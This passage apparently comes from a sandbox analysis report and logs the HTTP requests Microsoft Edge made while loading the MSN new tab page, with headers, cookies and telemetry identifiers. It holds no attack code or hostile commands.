{"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: workerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=3A35C6D9C75F44F1A696E1F20ED10EDD.RefC=2025-01-23T19:40:11Z; USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; MUIDB=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /crx/blobs/AcmIXbpGoRruM6Rg2pdHIUfNGnvAwJcqpFoWJV4Xd6PeYFnv5YpJ0-GVzjWL6XpCDzrg9cVo2bTwfPVau85UdyeFfZQe-rOdS7oyguq-391NmfeQd9WZZkjpgIbL1I5KKEcAxlKa5Z8JDrufy52udyO9TokqhOw4Sbnj/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.a8bc96a9c4710d87d862.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.7fc3109769390e0f7912.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common.f7b45d2c12f269c9e987.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experience.a3d5d471bc3c3cb17d2e.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /resolver/api/resolve/v3/config/?expType=AppConfig&expInstance=default&apptype=edgeChromium&v=20250123.293&targetScope={%22audienceMode%22:%22adult%22,%22browser%22:{%22browserType%22:%22edgeChromium%22,%22version%22:%22117%22,%22ismobile%22:%22false%22},%22deviceFormFactor%22:%22desktop%22,%22domain%22:%22ntp.msn.com%22,%22locale%22:{%22content%22:{%22language%22:%22en%22,%22market%22:%22us%22},%22display%22:{%22language%22:%22en%22,%22market%22:%22us%22}},%22os%22:%22windows%22,%22platform%22:%22web%22,%22pageType%22:%22dhp%22,%22pageExperiments%22:[%22prg-1s-dwvid-wpo%22,%22prg-1s-twid%22,%22prg-1s-workid%22,%22prg-1s-wxtrendv3%22,%22prg-1sw-aitt-ct%22,%22prg-1sw-artf1%22,%22prg-1sw-artrcnr%22,%22prg-1sw-bg-p2%22,%22prg-1sw-bmcon%22,%22prg-1sw-c-prefetchcrs%22,%22prg-1sw-cmevlt%22,%22prg-1sw-crypinf%22,%22prg-1sw-cryptren%22,%22prg-1sw-fc-ghads%22,%22prg-1sw-ldny-transit%22,%22prg-1sw-mtr-en%22,%22prg-1sw-nodenseifp%22,%22prg-1sw-reclaim%22,%22prg-1sw-reclaim2%22,%22prg-1sw-sa-shortintentt1%22,%22prg-1sw-sa-uienichev2t21%22,%22prg-1sw-sacfx2t2%22,%22prg-1sw-sagervunipb%22,%22prg-1sw-saphidei3c%22,%22prg-1sw-tbrfltr%22,%22prg-1sw-tran-trd%22,%22prg-1sw-tvid-p1%22,%22prg-1sw-tvid-t20%22,%22prg-1sw-userwid%22,%22prg-1sw-videopb%22,%22prg-1sw-videosxap%22,%22prg-1sw-wxnhcolk%22,%22prg-1sw-wxomghd%22,%22prg-ad-bdup-5%22,%22prg-ad-conf-ext%22,%22prg-ad-img-retry%22,%22prg-ad-pdedupeb%22,%22prg-adspeek%22,%22prg-cg-ab-testing%22,%22prg-cg-cfzhcnfx%22,%22prg-cg-ingames-ct%22,%22prg-cg-int-ad-pod%22,%22prg-cg-lstfix%22,%22prg-cg-pwa-lock%22,%22prg-cxtsc-c%22,%22prg-fin-compof%22,%22prg-fin-hpoflio%22,%22prg-fin-mwlc%22,%22prg-fin-p1duea%22,%22prg-fin-p2duea%22,%22prg-fin-poflio%22,%22prg-fin-rmar-ct%22,%22prg-gc-pickwinner%22,%22prg-msn-blsbidmho%22,%22prg-p1-txt2%22,%22prg-p1-uc3%22,%22prg-p2-tf-bdgpv-ai%22,%22prg-pr1-videos%22,%22prg-pr2-2cinfopane%22,%22prg-pr2-2clazyifp%22,%22prg-pr2-aisi%22,%22prg-pr2-aitt%22,%22prg-pr2-c-prespot%22,%22prg-pr2-fieplc%22,%22prg-pr2-lazyifpdma%22,%22prg-pr2-lazyippl0%22,%22prg-pr2-lifecycleba%22,%22prg-pr2-marketsel-c%22,%22prg-pr2-nobgifpnrot%22,%22prg-pr2-rail2colboard%22,%22prg-pr2-stalecontent%22,%22prg-pr2-stalecontent-dt%22,%22prg-pr2-tf-local-c1%22,%22prg-pr2-trf-rhighimp%22,%22prg-pr2-trfnblc%22,%22prg-pr2-uxmitipreimg%22,%22prg-pr2-wwidgets-t%22,%22prg-pr2-wxevolnoti%22,%22prg-pw-t-cct-migrate%22,%22prg-pw-t-no-ad-css%22,%22prg-sh-bd-video%22,%22prg-sh-dealsdaypdp%22,%22prg-sh-frnrc%22,%22prg-sh-rmitmlnk%22,%22prg-shipwidoff%22,%22prg-sp-liveapi%22,%22prg-stalewhp%22,%22prg-tv-api%22,%22prg-tv-segcap10%22,%22prg-upsaip-w1-t%22,%22prg-vid-cd%22,%22prg-vid-trdcache%22,%22prg-widgets-manager%22,%22prg-widgets-region%22,%22prg-wtch-chsb-c%22,%22prg-wx-dhgrd-c%22,%22prg-wx-nfor%22]} HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-feed-libs.5fd273d0fc8ef0378ad1.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /service/msn/user?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=3A35C6D9-C75F-44F1-A696-E1F20ED10EDD&ocid=pdp-peregrine&cm=en-us&it=app&user=m-36CB6A348F62672B3E3A7F498E00663A&scn=APP_ANON&source=market-consolidation HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://ntp.msn.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-cscore.6e0711917552da24ba6f.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/super-nav.e1d340c50396d2b009ae.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/experiences_top-sites-edgenext-wc_dist_TopSitesEdgeNextWC_addDialog_js-experiences_top-sites--c06b42.8ee34ad56c99bb958dca.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/node_modules_sortablejs_modular_sortable_esm_js.98cd32e4ed2776436d71.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /c.gif?rnd=1737661217428&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=3a35c6d9c75f44f1a696e1f20ed10edd&activityId=3a35c6d9c75f44f1a696e1f20ed10edd&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1
Source: global traffic HTTP traffic detected: GET /b?rn=1737661217429&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=36CB6A348F62672B3E3A7F498E00663A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/brand/new-msn-logo-color-black.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1; MUIDB=36CB6A348F62672B3E3A7F498E00663A
Source: global traffic HTTP traffic detected: GET /staticsb/statics/latest/icons-wc/icons/FeedSettings.svg HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1; MUIDB=36CB6A348F62672B3E3A7F498E00663A
Source: global traffic HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New+tab&enableForceCache=true HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-viewport-height: 876sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 10sec-ch-ua-bitness: "64"sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 200sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=3A35C6D9C75F44F1A696E1F20ED10EDD.RefC=2025-01-23T19:40:11Z; USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; MUIDB=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=79152d70-0c76-4bcf-bb6a-0dcbed0d61a3; ai_session=uD0SM9lVnN+ZBovzvvWf2A|1737661217424|1737661217424; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=3A35C6D9C75F44F1A696E1F20ED10EDD.RefC=2025-01-23T19:40:11Z
Source: global traffic HTTP traffic detected: GET /edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true HTTP/1.1Host: ntp.msn.comConnection: keep-aliveCache-Control: max-age=0Accept: */*Service-Worker: scriptUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-edge-ntp: {"back_block":0,"bg_cur":{"configIndex":26,"imageId":"BB1msOZ4","provider":"CMSImage","userSelected":false},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"myFeed","show_greet":true,"vt_opened":false,"wpo_nx":{"v":"2","wgt":{"src":"default"}}}Sec-Fetch-Site: same-originSec-Fetch-Mode: same-originSec-Fetch-Dest: serviceworkerReferer: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_Auth=; pglt-edgeChromium-dhp=547; sptmarket=en-GB||us|en-us|en-us|en||cf=8|RefA=3A35C6D9C75F44F1A696E1F20ED10EDD.RefC=2025-01-23T19:40:11Z; USRLOC=; MUID=36CB6A348F62672B3E3A7F498E00663A; MUIDB=36CB6A348F62672B3E3A7F498E00663A; _EDGE_S=F=1&SID=31C482BC84B769983F0597C18506681B; _EDGE_V=1; MicrosoftApplicationsTelemetryDeviceId=79152d70-0c76-4bcf-bb6a-0dcbed0d61a3; ai_session=uD0SM9lVnN+ZBovzvvWf2A|1737661217424|1737661217424; sptmarket_restored=en-GB||us|en-us|en-us|en||cf=8|RefA=3A35C6D9C75F44F1A696E1F20ED10EDD.RefC=2025-01-23T19:40:11Z
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/ocvFeedback.c1e5c0f1eeb413118a8c.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/diagnostic-web-vitals.95b1542329807b1f42ef.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/common-others.918af0be2371c480a676.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/weather-one-liner.cb56dc4da2dc32a76f42.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/nurturing-banner.cef8d219ef568729016b.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
